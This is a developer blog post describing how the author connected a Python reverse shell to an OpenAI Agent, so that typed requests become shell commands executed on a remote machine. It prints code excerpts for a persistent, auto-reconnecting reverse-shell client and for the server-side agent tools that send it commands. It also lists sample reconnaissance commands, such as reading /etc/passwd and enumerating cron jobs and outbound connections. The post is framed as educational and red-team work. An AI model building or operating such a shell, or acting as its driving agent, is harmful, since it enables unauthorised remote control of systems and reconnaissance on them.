paulsaul621

Posted on May 26

Controlling a Reverse Shell Using OpenAI Agents: A Technical Deep Dive

Demo

Introduction

This project explores the integration of a traditional reverse shell with an OpenAI-powered Agent. The goal: to issue natural language instructions and have them automatically translated into system-level commands that are executed on a remote machine.

You type:

"List all log files modified today."

The system:

Interprets your intent
Infers the operating system
Generates an appropriate shell command
Executes it remotely via a socket
Returns the output, all without manually touching the terminal

In this post, I’ll walk through how I built this system without releasing the entire source code. Instead, I’ll explain the design decisions, the architecture, and include key code excerpts that show the core logic.

This is not a product or a public tool. It’s an educational deep dive for engineers, security professionals, and AI developers curious about what happens when you give an OpenAI Agent access to a shell.

1. Foundation: The Reverse Shell

The reverse shell was implemented in Python. The client script is designed to:

Initiate a TCP connection back to a server
Wait for shell commands over the socket
Execute received commands with subprocess.Popen
Return the combined stdout and stderr back to the server

Key logic for command execution:

def execute_command(command):
    if command.startswith("cd "):
        try:
            os.chdir(command[3:].strip())
            return ""
        except Exception as e:
            return str(e)
    try:
        output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
        return output.decode(errors="ignore")
    except subprocess.CalledProcessError as e:
        return e.output.decode(errors="ignore")

The client loops persistently, reconnecting automatically if the server goes down or the connection drops:

while True:
    try:
        s.connect((HOST, PORT))
        # Handle command-receive-execute-return loop
    except socket.error:
        time.sleep(RETRY_DELAY)

2. The Server: Dispatcher + Agent Host

The server binds to a TCP port and accepts incoming connections from the client. Once connected, it wraps the socket interface into callable tools for the OpenAI Agent.

A core piece is the function that sends shell commands:

@function_tool
def execute_command(command: str) -> str:
    if connection:
        connection.sendall(command.encode())
        return connection.recv(4096).decode()
    return "No client connected."

For larger outputs, we use chunked reading:

def receive_chunks(sock):
    buffer = ""
    while True:
        data = sock.recv(4096).decode()
        if "<<EOT>>" in data:
            buffer += data.replace("<<EOT>>", "")
            break
        buffer += data
    return buffer.strip()

3. Agent Configuration

I used OpenAI's Agent interface with a structured instruction set:

agent = Agent(
    name="Shell Assistant",
    instructions="""
    You control a remote shell. Interpret user input as system administration requests.
    Detect the OS and use the correct shell syntax. Use execute_command for simple commands,
    and execute_command_with_chunking when long output is expected.
    """,
    tools=[execute_command, execute_command_with_chunking]
)

This gave the Agent flexibility to respond to vague requests like:

"Check available disk space"

With logic like:

if os_type == "linux":
    command = "df -h"
elif os_type == "windows":
    command = "wmic logicaldisk get size,freespace,caption"

4. Memory and Follow-Up Commands

I implemented a FIFO memory store (simple list buffer) that remembers the last N exchanges:

class ConversationMemory:
    def __init__(self, max_entries):
        self.history = []
        self.max_entries = max_entries

    def add(self, user_input, ai_response):
        self.history.append((user_input, ai_response))
        if len(self.history) > self.max_entries:
            self.history.pop(0)

This lets the Agent handle things like:

“Show me the second error in that list"
“Now delete the last log file you showed"

Context matters when dealing with shell output.

5. Error Handling and Recovery

The client script wraps all networking and shell calls in try/except. If the socket dies or the command fails, the error is caught and returned as a string to the server:

try:
    result = execute_command(cmd)
    sock.send(result.encode())
except Exception as e:
    sock.send(f"[ERROR] {str(e)}".encode())

On the server side, I wrap recv() in a timeout loop so that dropped clients don’t cause crashes.

6. OS-Aware Execution

The Agent detects the remote OS using probing commands:

# Initial check
os_check = execute_command("uname")
if "Linux" in os_check:
    os_type = "linux"
elif "Windows" in os_check or "Microsoft" in os_check:
    os_type = "windows"

The Agent then adapts syntax and tool selection to match.

Examples:

    "Show me open ports"
    "List services"

7. Tool Design and Extension

The Agent interface made it easy to add new tools:

@function_tool
def list_large_files(path: str, size_mb: int) -> str:
    return execute_command(f"find {path} -type f -size +{size_mb}M")

I used this pattern for tools like:

system_info()
network_info()
read_file()
restart_service()

Every tool is auditable and explicitly defined. The Agent never gets full shell access — only access to tool wrappers.

8. Sample Interactions

You: List all scheduled tasks and cron jobs
Agent:

crontab -l && cat /etc/crontab && ls -la /etc/cron.*

Client:
[returns user and system-wide cron tasks]

You: Find all world-writable files in the root directory and subdirectories
Agent:

find / -type f -perm -o+w 2>/dev/null

Client:
[returns paths to risky writable files]

You: Search for all .conf files modified in the last 3 days and show their first 10 lines
Agent:

find /etc -name '*.conf' -mtime -3 -exec head -n 10 {} +

Client:
[returns headers from config files]

You: List all active outbound network connections
Agent:

ss -tunap | grep ESTAB

Client:
[returns established connections with remote IPs and ports]

You: Show me all users with shell access and UID ≥ 1000
Agent:

awk -F: '($3>=1000)&&($7!~/nologin/){print $1}' /etc/passwd

Client:
[returns usernames]

You: Identify any processes running from /tmp or without an executable path
Agent:

ps aux | grep '/tmp'

Client:
[returns process list suspicious for temp-based execution]

9. Code Excerpts Only

I’m not publishing the full code. However, here’s the structure for the main loop inside the server:

while True:
    try:
        user_input = input("> ")
        agent.instructions = get_updated_instructions(memory)
        result = await Runner.run(agent, user_input)
        memory.add(user_input, result.final_output)
        print(result.final_output)
    except KeyboardInterrupt:
        break

And for the client execution loop:

while True:
    data = sock.recv(1024)
    if not data:
        break
    command = data.decode()
    output = execute_command(command)
    sock.send(output.encode())

10. Final Thoughts

This project gave me a glimpse of what LLMs can do beyond chat and summarization: they can reason, infer intent, adapt to systems, and act as true automation layers.

I plan to open-source when I add new features to include, which includes a flask UI, I hope the ideas here inspire others working at the intersection of:

AI tooling
Red team automation
Remote ops
Natural language command execution

DEV Community